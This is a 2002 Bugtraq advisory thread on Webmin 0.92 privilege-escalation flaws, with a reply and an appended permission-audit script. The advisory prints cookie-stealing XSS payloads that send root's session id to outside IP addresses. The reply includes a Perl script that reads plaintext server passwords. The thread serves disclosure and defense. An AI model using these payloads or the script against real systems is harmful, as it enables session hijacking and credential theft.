8172157 2002-03-21 10:01 +1200  /81 lines/  <advisory@prophecy.net.nz>
Sent by: joel@lysator.liu.se
Imported: 2002-03-21  00:49  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21507>
Subject: Local privilege escalation issues with Webmin 0.92
------------------------------------------------------------
From: <advisory@prophecy.net.nz>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0203210958150.13238-100000@salamander.incet.com>

18-02-02 -- advisory@prophecy.net.nz


About Webmin:
-------------
"Webmin is a web-based interface for system administration for Unix. Using
any browser that supports tables and forms (and Java for the File Manager
module), you can setup user accounts, Apache, DNS, file sharing and so
on."



Problem #1:
-----------
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory.
This means that if command logging within webmin is enabled, any local
user can read the /var/webmin/webmin.log file and retrieve the root user's
sid (cookie session id).
It is trivial to then create a faked local cookie using this session-id,
and log directly into webmin as root.


Problem #2:
-----------
If a semi-trusted colleague is given a restricted level of
access to some Webmin functions, specifically sendmail, then
malicious code can be inserted into certain files
that would result in revealing root's webmin sid (cookie session id)
when the root user visits the related page in webmin.


Example Exploit:
----------------
Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/* */document.write('<img
src="http://192.168.40.1/'+document.cookie+'">');</script>

Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

Potentially more likely to be exploited, however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML interface (where the code being read in is
not checked for HTML).  An example would be changing their 'real name' in
/etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, you get
the idea.)

This same problem exists in most parts of webmin, where files (or
command output like 'ps') are read in and displayed in the web
interface.



Solution:
---------
Upgrade to the latest version of Webmin (0.93), which fixes these issues
(as well as a couple of others apparently).
Available from:  http://www.webmin.com/download.html


Thanks to:
----------
Harry Metcalfe <harrym@the-group.org> - for giving me the original idea
about ways to steal cookies from webpages.
Jamie Cameron <jcameron@webmin.com> - for listening to me and making an
effort to keep in touch as he fixed the problem(s).
(8172157) / <advisory@prophecy.net.nz>/---(Rewrapped)
Comment in text 8183648 by Ed <ekg@tricity.wsu.edu>
8183648 2002-03-20 18:22 -0800  /123 lines/ Ed <ekg@tricity.wsu.edu>
Sent by: joel@lysator.liu.se
Imported: 2002-03-23  03:45  by Brevbäraren
External recipient: advisory@prophecy.net.nz
External Cc recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21565>
Comment on text 8172157 by  <advisory@prophecy.net.nz>
Subject: Re: Local privilege escalation issues with Webmin 0.92
------------------------------------------------------------
From: Ed <ekg@tricity.wsu.edu>
To: advisory@prophecy.net.nz
Cc: bugtraq@securityfocus.com
Message-ID: <20020320182238.A2654@beta.tricity.wsu.edu>

as a small addendum to this advisory, we noticed some similar file
permission problems in /etc/webmin/servers/, in our local webmin
installation.  we were using webmin-0.92-1, noarch RPM version.  this
problem was reported to Jamie last month and is fixed in webmin 0.93.

this problem could allow a local user to read the webmin user
passwords for remote hosts running webmin, configured under the
'webmin' >> 'webmin servers' >> 'edit server' page.  this is a
problem only if we enter the login information for a server, so as to
enable auto-login, and thus, could lead to 'root' or 'admin' access
(on the remote webmin server) if we are using the cluster users,
groups, or packages feature of webmin.

the username and password are stored, in plaintext, with the rest of
the host information in /etc/webmin/servers/${time}.serv, where
${time} is the time that the remote server was first discovered by
the local webmin, measured as a number of seconds since the epoch.
/etc/webmin/servers has the search bit enabled, but not the read bit.
therefore we can read the server information files by searching
backwards from the current time, e.g.:

#!/usr/bin/perl
# read server info files by stepping backwards from current time
use strict;
use warnings;

print STDERR "looking for server info from /etc/webmin/servers, press ^c to end\n";
for (my $tstamp = time(); $tstamp > 0; $tstamp--) {
  # the directory is searchable but not readable, so probe names one by one
  open(my $servinfo, '<', "/etc/webmin/servers/$tstamp.serv") or next;
  print "contents of /etc/webmin/servers/$tstamp.serv:\n";
  print <$servinfo>;
  close $servinfo or die "error detected on file close";
}

moral: if you were running a vulnerable version of webmin, it may be
prudent to change all your passwords after you upgrade, as they may
have been exposed.  also i might double-check that these files are
not readable, on all of your webmin servers.

thanks to Jamie for making such a great web administration package for
unix, and keeping on top of security problems/reports.

  Ed

(8183648) /Ed <ekg@tricity.wsu.edu>/------(Rewrapped)
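The two permission problems in this thread (the advisory's /var/webmin and webmin.log, and Ed's /etc/webmin/servers with its plaintext .serv files) can be checked with one audit script. This is an added example, not code from either post or from Webmin; the optional root prefix and the WEBMIN_ROOT variable are assumptions so the check can be run against a constructed directory tree.

```shell
#!/bin/sh
# Audit the Webmin paths named in this thread for "other" permission bits.
# Added defender example, not from the advisory, the reply, or Webmin.
# The first argument (or WEBMIN_ROOT) is prefixed to each path so the
# check can run on a constructed tree; empty means the live filesystem.

# Print the "other" permission digit (0-7) of a path; nothing if absent.
other_bits() {
    [ -e "$1" ] || return 0
    mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1")
    printf '%s\n' "${mode#"${mode%?}"}"   # last octal digit = other
}

# Report one path; return 1 when any bit of MASK is set for "other".
# MASK 4 = world-readable, 1 = world-searchable, 5 = either.
check_path() {
    path=$1 mask=$2
    bits=$(other_bits "$path")
    if [ -z "$bits" ]; then
        echo "missing  $path"; return 0
    fi
    if [ $(( $bits & $mask )) -ne 0 ]; then
        echo "EXPOSED  o=$bits $path"; return 1
    fi
    echo "ok       o=$bits $path"
}

# Check the directories and files from both posts. Returns the number of
# exposed paths (0 = clean), so it doubles as an exit status.
audit_webmin() {
    root=${1:-}
    exposed=0
    # Problem #1: /var/webmin must be neither readable nor searchable by
    # others, and webmin.log (holds session ids when logging is on) must
    # not be readable.
    check_path "$root/var/webmin" 5 || exposed=$((exposed + 1))
    check_path "$root/var/webmin/webmin.log" 4 || exposed=$((exposed + 1))
    # Ed's addendum: the search bit alone on the servers directory lets a
    # local user probe ${time}.serv names, and each .serv file holds a
    # plaintext remote login, so require no other bits on any of them.
    check_path "$root/etc/webmin/servers" 5 || exposed=$((exposed + 1))
    for f in "$root"/etc/webmin/servers/*.serv; do
        [ -e "$f" ] || continue
        check_path "$f" 4 || exposed=$((exposed + 1))
    done
    return "$exposed"
}

audit_webmin "${WEBMIN_ROOT:-}"
```

A non-zero exit status means at least one of the paths is exposed; the "missing" lines are informational, since a host without command logging or without Webmin Servers entries will not have all of these files.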